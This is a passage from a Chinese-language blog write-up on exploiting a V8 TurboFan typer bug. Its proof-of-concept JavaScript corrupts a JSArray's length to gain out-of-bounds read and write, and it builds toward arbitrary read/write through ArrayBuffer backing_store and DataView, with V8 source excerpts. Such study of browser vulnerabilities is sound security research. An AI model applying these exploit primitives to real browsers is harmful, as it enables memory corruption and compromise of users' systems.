class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">1.1</span>, <span class="number">2.2</span>, <span class="number">3.3</span>, <span class="number">4.4</span>, <span class="number">5.5</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>) + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740989</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(arr[t]);</span><br><span class="line">    <span class="comment">// 将arr数组详细信息输出</span></span><br><span class="line">    %<span class="title class_">DebugPrint</span>(arr);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 下断点，使v8在gdb中暂停</span></span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>启动GDB，可以看到 d8 自动暂停执行：</p><p><img src="/2021/01/v8-turboFan/gdbtrap.png" alt="img"></p><p>之后我们可以找到DebugPrint出的数组内存地址：</p><p><img src="/2021/01/v8-turboFan/debugprint1.png" alt="img"></p><p>每个Object内部都有一个map，该map用于描述对应结构的相关属性。其中包括了当前Object的实例大小，以及一些供GC使用的信息。通过上面的输出，我们可以得到，当前JSArray的实例大小只有32字节。</p><blockquote><p>map的具体信息请查阅源码 src/objects/map.h 中的注释。</p></blockquote><p>因此，数组中的其他元素肯定存放于另一个数组，而这个数组的类型为<code>FixedDoubleArray</code>，其地址存放于JSArray中。</p><blockquote><p>需要注意的是：v8 中的指针值大多被打上了tag，以便于区分某个值是pointer还是smi。</p><p>因此在gdb使用某个地址时，最低位需要手动置0。</p></blockquote><p>以下是某个 JSArray 的内存布局：</p><p><img src="/2021/01/v8-turboFan/debugprint2.png" alt="img"></p><p>注意到 JSArray中，第四个8字节数据（即上图中的<code>0x0000000500000000</code>）存放的是当前数组的length（5），即便数组元素并没有存放在当前这块内存上。</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/js-array.h</span></span><br><span class="line"><span class="comment">// static const int v8::internal::JSObject::kHeaderSize = 24</span></span><br><span class="line"><span class="keyword">static</span> <span class="keyword">const</span> int kLengthOffset = <span class="title class_">JSObject</span>::kHeaderSize;</span><br></pre></td></tr></table></figure><p>回到刚刚的话题，数组的值被存放在<code>FixedDoubleArray</code>中，因此我们输出一下内存布局看看：</p><p><img src="/2021/01/v8-turboFan/debugprint3.png" alt="img"></p><p>可以看到，它越界读取到的数据与先前猜测的一致，即最后一个元素的下一个8字节数据。</p><p>同时我们还可以从 gdb 的输出中注意到，一个 JSArray的length 即在 JSArray 中保存，又在 FixedDoubleArray 中存放着，这个也可以在源码中直接定位到操作：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/js-array-inl.h</span></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSArray::SetContent</span><span class="params">(Handle&lt;JSArray&gt; array,</span></span></span><br><span class="line"><span class="params"><span class="function">                         Handle&lt;FixedArrayBase&gt; storage)</span> </span>&#123;</span><br><span class="line">  <span class="built_in">EnsureCanContainElements</span>(array, storage, storage-&gt;<span class="built_in">length</span>(),</span><br><span class="line">                           ALLOW_COPIED_DOUBLE_ELEMENTS);</span><br><span class="line"></span><br><span class="line">  <span class="built_in">DCHECK</span>(</span><br><span class="line">      (storage-&gt;<span class="built_in">map</span>() == array-&gt;<span class="built_in">GetReadOnlyRoots</span>().<span class="built_in">fixed_double_array_map</span>() &amp;&amp;</span><br><span class="line">       <span class="built_in">IsDoubleElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>())) ||</span><br><span class="line">      ((storage-&gt;<span class="built_in">map</span>() != array-&gt;<span class="built_in">GetReadOnlyRoots</span>().<span class="built_in">fixed_double_array_map</span>()) &amp;&amp;</span><br><span class="line">       (<span class="built_in">IsObjectElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>()) ||</span><br><span class="line">        (<span class="built_in">IsSmiElementsKind</span>(array-&gt;<span class="built_in">GetElementsKind</span>()) &amp;&amp;</span><br><span class="line">         Handle&lt;FixedArray&gt;::<span class="built_in">cast</span>(storage)-&gt;<span class="built_in">ContainsOnlySmisOrHoles</span>()))));</span><br><span class="line">  <span class="comment">// length既保存在 JSArray 中，也保存在 FixedArrayBase里</span></span><br><span class="line">  array-&gt;<span class="built_in">set_elements</span>(*storage);</span><br><span class="line">  array-&gt;<span class="built_in">set_length</span>(Smi::<span class="built_in">FromInt</span>(storage-&gt;<span class="built_in">length</span>()));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但实际上， FixedDoubleArray 中的 length 只用于提供有关固定数组分配的信息，而越界检查只会检查 JSArray 的length，这意味着我们<strong>必须修改 JSArray 的 length 才可以进行任意地址读写</strong>。</p><blockquote><p>以下是检测数组访问是否越界的代码：</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/ic/ic.cc</span></span><br><span class="line"><span class="function"><span class="type">bool</span> <span class="title">IsOutOfBoundsAccess</span><span class="params">(Handle&lt;Object&gt; receiver, <span class="type">uint32_t</span> index)</span> </span>&#123;</span><br><span class="line">  <span class="type">uint32_t</span> length = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsJSArray</span>()) &#123;</span><br><span class="line">    <span class="comment">// 获取 JSArray 的 length</span></span><br><span class="line">    JSArray::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">length</span>()-&gt;<span class="built_in">ToArrayLength</span>(&amp;length);</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsString</span>()) &#123;</span><br><span class="line">    length = String::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">length</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (receiver-&gt;<span class="built_in">IsJSObject</span>()) &#123;</span><br><span class="line">    length = JSObject::<span class="built_in">cast</span>(*receiver)-&gt;<span class="built_in">elements</span>()-&gt;<span class="built_in">length</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// 判断是否越界</span></span><br><span class="line">  <span class="keyword">return</span> index &gt;= length;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function">KeyedAccessLoadMode <span class="title">GetLoadMode</span><span class="params">(Isolate* isolate, Handle&lt;Object&gt; receiver,</span></span></span><br><span class="line"><span class="params"><span class="function">                                <span class="type">uint32_t</span> index)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 一开始就判断越界</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">IsOutOfBoundsAccess</span>(receiver, index)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> STANDARD_LOAD;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">函数调用栈帧：</span></span><br><span class="line"><span class="comment">    #0  v8::internal::(anonymous namespace)::IsOutOfBoundsAccess</span></span><br><span class="line"><span class="comment">    #1  v8::internal::(anonymous namespace)::GetLoadMode</span></span><br><span class="line"><span class="comment">    #2  v8::internal::KeyedLoadIC::Load</span></span><br><span class="line"><span class="comment">    #3  v8::internal::__RT_impl_Runtime_KeyedLoadIC_Miss</span></span><br><span class="line"><span class="comment">    #4  v8::internal::Runtime_KeyedLoadIC_Miss</span></span><br><span class="line"><span class="comment">    #5  Builtins_CEntry_Return1_DontSaveFPRegs_ArgvOnStack_NoBuiltinExit</span></span><br><span class="line"><span class="comment">    ....</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure><p>为了验证上述内容的正确性，笔者手动用gdb修改了 JSArray 的 length，发现在 release 版本的v8下<strong>可以越界读取</strong>。但在 debug 版本下，会触发<code>FixedArray</code>中的<code>DCHECK</code>检查导致崩溃：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/fixed-array-inl.h</span></span><br><span class="line"><span class="built_in">DCHECK</span>(index &gt;= <span class="number">0</span> &amp;&amp; index &lt; <span class="keyword">this</span>-&gt;<span class="built_in">length</span>());</span><br></pre></td></tr></table></figure><p>因此在编译 debug 版本的 v8 时，需要手动注释掉<code>src/objects/fixed-array-inl.h</code> 中越界检查的DCHECK</p><blockquote><p>请勿直接编译 release 版本的v8来关闭DCHECK，这会大大提高调试难度。</p></blockquote><h4 id="b-构造任意地址读写">b. 构造任意地址读写</h4><h5 id="1-JSArray-修改-length">1) JSArray 修改 length</h5><ul><li><p>我们将 FixedArray 的内存布局输出，可以发现 JSArray 和 FixedArray 的数据是<strong>紧紧相邻</strong>的，且 FixedArray 位于低地址处，这为我们修改 JSArray 的 length 提供了一个非常好的条件：</p><p><img src="/2021/01/v8-turboFan/debugprint4.png" alt="img"></p></li><li><p>现在我们可以试着越界修改一下 JSArray 的 length。需要注意我们必须越界四格才能修改到length，因此需要稍微修改一下POC越界的范围：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">f</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>]; <span class="comment">// length =&gt; Range(7, 7)</span></span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    <span class="comment">// 此时 t =&gt; 解释/编译 Range(9007199254740989, 9007199254740992)</span></span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(9007199254740991, 9007199254740992)</span></span><br><span class="line"><span class="comment">        编译：Range(9007199254740991, 9007199254740994)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(1, 2)</span></span><br><span class="line"><span class="comment">        编译：Range(1, 4)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(2, 4)</span></span><br><span class="line"><span class="comment">        编译：Range(2, 8)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    <span class="comment">/* 此时 t =&gt; </span></span><br><span class="line"><span class="comment">        解释：Range(4, 6)</span></span><br><span class="line"><span class="comment">        编译：Range(4, 10)</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(arr[t]);</span><br><span class="line">    %<span class="title class_">DebugPrint</span>(arr);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(f);</span><br><span class="line"><span class="title function_">f</span>(<span class="number">1</span>);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>最后输出了<code>1.4853970537e-313</code>，用gdb转换成int类型，刚好为<code>7</code>，这就意味着我们现在可以修改 JSArray 的 length 了。</p><p>试一试：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> oob_arr = [];</span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>)</span><br><span class="line">&#123;</span><br><span class="line">    oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span><br><span class="line">    <span class="keyword">let</span> t = (x == <span class="number">1</span> ? <span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span><br><span class="line">    t = t + <span class="number">1</span> + <span class="number">1</span>;</span><br><span class="line">    t -= <span class="number">9007199254740990</span>;</span><br><span class="line">    t *= <span class="number">2</span>;</span><br><span class="line">    t += <span class="number">2</span>;</span><br><span class="line">    <span class="comment">// 将 smi(1024) 写入至 JSArray 的 length处</span></span><br><span class="line">    oob_arr[t] = <span class="number">2.1729236899484389e-311</span>; <span class="comment">// 1024.f2smi</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// 尝试优化</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span><br><span class="line">    <span class="title function_">opt_me</span>(<span class="number">1</span>);</span><br><span class="line"><span class="comment">// 试着越界读取一下</span></span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(oob_arr.<span class="property">length</span>);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(oob_arr[<span class="number">100</span>]);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>可以发现，<strong>越界读写成功</strong>！</p><p><img src="/2021/01/v8-turboFan/debugprint5.png" alt="img"></p><p>在附件chromium中试试发现也是可以正常工作的：</p><p><img src="/2021/01/v8-turboFan/chromium_output1.png" alt="img"></p><p>但我们发现 v8 和 chromium 输出的值不一样，所以调试 d8 编写 JS 后还需要到 chromium 这边验证一下。</p><blockquote><p>这里有个注意点，在被turboFan优化过的函数中读写数组，其越界判断不会通过我们所熟知的<code>Runtime_KeyedLoadIC_Miss</code>函数，因此越界操作最好在被优化的函数外部执行。</p></blockquote></li><li><p>现在我们已经成功让 JSArray 实现大范围<strong>向后</strong>越界读取，但这明显不够，因为 JSArray 只能<strong>向后</strong>越界读写 <code>0x40000000</code>字节，有范围限制。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/objects/fixed-array.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> V8_HOST_ARCH_32_BIT</span></span><br><span class="line">  <span class="type">static</span> <span class="type">const</span> <span class="type">int</span> kMaxSize = <span class="number">512</span> * MB;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">  <span class="type">static</span> <span class="type">const</span> <span class="type">int</span> kMaxSize = <span class="number">1024</span> * MB;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span>  <span class="comment">// V8_HOST_ARCH_32_BIT</span></span></span><br></pre></td></tr></table></figure><p>看样子我们可以再次声明一个 JSArray ，然后越界修改其 elements 地址以达到任意地址读写的目的？实际上是不行的，因为每一个 element 都有其对应的 map 指针，如果我们要通过修改 elements 地址来进行任意读的话，我们还必须在目标地址手动伪造一个 fake map，但通常我们是没有办法来伪造的。</p><p>因此接下来我们将引入漏洞利用中比较常用的类型：<strong>ArrayBuffer</strong>。</p></li></ul><h5 id="2-ArrayBuffer">2) ArrayBuffer</h5><ul><li><p><code>ArrayBuffer</code>是漏洞利用中比较常见的一个对象，这个对象用于表示通用的、固定长度的原始二进制数据缓冲区。通常我们不能直接操作<code>ArrayBuffer</code>的内容，而是要通过类型数组对象（JSTypedArray）或者<code>DataView</code>对象来操作，它们会将缓冲区中的数据表示为特定的格式，并且通过这些格式来读写缓冲区的内容。<br><img src="/2021/01/v8-turboFan/console_print1.png" alt="img"></p><p>而 ArrayBuffer中的缓冲区内存，就是 v8 中 JSArrayBuffer 对象中的 <strong>backing_store</strong> 。</p></li><li><p>需要注意的是，ArrayBuffer 自身也有 element。这个 element 和 backing_store <strong>不是同一个东西</strong>：element 是一个 JSObject，而 backing_store 只是单单一块堆内存。 因此，单单修改 element 或 backing_store 里的数据都不会影响到另一个位置的数据。</p><p>以下是一个简单的 JS 测试代码：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x400</span>);</span><br><span class="line">int = <span class="keyword">new</span> <span class="title class_">Int32Array</span>(buffer);</span><br><span class="line">int[<span class="number">2</span>] = <span class="number">1024</span>;</span><br><span class="line">buffer[<span class="number">1</span>] = <span class="number">0x200</span>;</span><br><span class="line">%<span class="title class_">DebugPrint</span>(buffer);</span><br><span class="line">%<span class="title class_">SystemBreak</span>();</span><br></pre></td></tr></table></figure><p>浏览器中输出的结果：</p><p><img src="/2021/01/v8-turboFan/console_print2.png" alt="img"></p><p>gdb中输出的地址信息：</p><p><img src="/2021/01/v8-turboFan/debugprint11.png" alt="img"></p></li><li><p>我们可以很容易的推测出，那些 <strong>JSTypedArray 读写的都是 ArrayBuffer 的 backing_store</strong>，因此如果我们可以任意修改 ArrayBuffer 的 backing_store，那么就可以通过 JSTypedArray 进行任意地址读写。</p><blockquote><p>JSTypedArray 包括但不限于 DataView、Int32Array、Int64Array、Float32Array、Float64Array 等等。</p></blockquote><p>笔者将在下面使用<code>DataView</code>对象来对 ArrayBuffer 的 backing_store 进行读写。为了证明 DataView 修改的确实是 ArrayBuffer 中 backing_store 指向的那块堆内存，笔者找到其对应的代码：</p><blockquote><p>注：以下代码来自<code>v8/src/builtins/data-view.tq</code>，代码语言为V8 <code>Torque</code>。该语言的语法类似于<code>TypeScript</code>，其设计目的在于更方便的表示高级的、语义丰富的V8实现。Torque编译器使用CodeStubAssembler将这些片断转换为高效的汇编代码。</p><p>更多关于该语言的信息请查阅 <a href="https://v8.dev/docs/torque">V8 Torque user manual</a>。</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// v8/src/builtins/data-view.tq</span></span><br><span class="line">javascript builtin <span class="title class_">DataViewPrototypeSetFloat64</span>(</span><br><span class="line">    <span class="attr">context</span>: <span class="title class_">Context</span>, <span class="attr">receiver</span>: <span class="title class_">Object</span>, ...<span class="variable language_">arguments</span>): <span class="title class_">Object</span> &#123;</span><br><span class="line">      <span class="keyword">let</span> <span class="attr">offset</span>: <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">0</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">0</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="keyword">let</span> value : <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">1</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">1</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="keyword">let</span> is_little_endian : <span class="title class_">Object</span> = <span class="variable language_">arguments</span>.<span class="property">length</span> &gt; <span class="number">2</span> ?</span><br><span class="line">          <span class="variable language_">arguments</span>[<span class="number">2</span>] :</span><br><span class="line">          <span class="title class_">Undefined</span>;</span><br><span class="line">      <span class="comment">// 在越界检查完成后，继续调用 DataViewSet函数。</span></span><br><span class="line">      <span class="keyword">return</span> <span class="title class_">DataViewSet</span>(context, receiver, offset, value,</span><br><span class="line">                         is_little_endian, <span class="title class_">FLOAT64</span>_ELEMENTS);</span><br><span class="line">    &#125;</span><br><span class="line">macro <span class="title class_">DataViewSet</span>(<span class="attr">context</span>: <span class="title class_">Context</span>,</span><br><span class="line">                    <span class="attr">receiver</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">offset</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">value</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">requested_little_endian</span>: <span class="title class_">Object</span>,</span><br><span class="line">                    <span class="attr">kind</span>: constexpr <span class="title class_">ElementsKind</span>): <span class="title class_">Object</span> &#123;</span><br><span class="line">    <span class="comment">// 获取当前 DataView 类型</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">data_view</span>: <span class="title class_">JSDataView</span> = <span class="title class_">ValidateDataView</span>(</span><br><span class="line">        context, receiver, <span class="title class_">MakeDataViewSetterNameString</span>(kind));</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">littleEndian</span>: bool = <span class="title class_">ToBoolean</span>(requested_little_endian);</span><br><span class="line">    <span class="comment">// 获取当前 DataView 中的 Buffer，即对应的 ArrayBuffer</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">buffer</span>: <span class="title class_">JSArrayBuffer</span> = data_view.<span class="property">buffer</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">      <span class="keyword">let</span> <span class="attr">double_value</span>: float64 = <span class="title class_">ChangeNumberToFloat64</span>(num_value);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> <span class="title function_">constexpr</span> (kind == <span class="title class_">UINT8</span>_ELEMENTS || kind == <span class="title class_">INT8</span>_ELEMENTS) &#123;</span><br><span class="line">         <span class="comment">// ...</span></span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> <span class="title function_">constexpr</span> (kind == <span class="title class_">FLOAT64</span>_ELEMENTS) &#123;</span><br><span class="line">      <span class="comment">// 将一个64位值分解成两个32位值并写入Buffer.</span></span><br><span class="line">        <span class="keyword">let</span> <span class="attr">low_word</span>: uint32 = <span class="title class_">Float64ExtractLowWord32</span>(double_value);</span><br><span class="line">        <span class="keyword">let</span> <span class="attr">high_word</span>: uint32 = <span class="title class_">Float64ExtractHighWord32</span>(double_value);</span><br><span class="line">        <span class="title class_">StoreDataView64</span>(buffer, bufferIndex, low_word, high_word,</span><br><span class="line">                        littleEndian);</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">Undefined</span>;</span><br><span class="line">  &#125;</span><br><span class="line">macro <span class="title class_">StoreDataView64</span>(<span class="attr">buffer</span>: <span class="title class_">JSArrayBuffer</span>, <span class="attr">offset</span>: intptr,</span><br><span class="line">                        <span class="attr">low_word</span>: uint32, <span class="attr">high_word</span>: uint32,</span><br><span class="line">                        <span class="attr">requested_little_endian</span>: bool) &#123;</span><br><span class="line">    <span class="comment">// 获取写入的内存地址，这里取的是 ArrayBuffer 中的 backing_store </span></span><br><span class="line">    <span class="comment">// 可以看到这个结果与我们的预计是一致的。</span></span><br><span class="line">    <span class="keyword">let</span> <span class="attr">data_pointer</span>: <span class="title class_">RawPtr</span> = buffer.<span class="property">backing_store</span>;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">if</span> (requested_little_endian) &#123;</span><br><span class="line">      <span class="comment">// 将值写入 backing_store。</span></span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset, b0);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">1</span>, b1);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">2</span>, b2);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">3</span>, b3);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">4</span>, b4);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">5</span>, b5);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">6</span>, b6);</span><br><span class="line">      <span class="title class_">StoreWord8</span>(data_pointer, offset + <span class="number">7</span>, b7);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure></li><li><p>因此，现在我们可以试着构建任意地址读写原语</p></li></ul><h5 id="3-任意地址读写原语">3) 任意地址读写原语</h5><ul><li><p>根据上面的分析，我们可以梳理一条这样的过程来构造任意地址读写原语：</p><ul><li>通过 OOB 修改其自身 JSArray 的 length，从而达到大范围越界读写。</li><li>试着<strong>将 ArrayBuffer 分配到与 OOB 的 JSArray 相同的内存段上</strong>，这样就可以通过 OOB 来修改 ArrayBuffer 的 backing_store。</li><li>将 ArrayBuffer 与 DataView 对象关联，这样就可以在 JSArray 越界修改 ArrayBuffer 的 backing_store 后，通过DataView 对象读写目标内存。</li></ul></li><li><p>需要注意的是，在确定 FixedDoubleArray 与 backing_store 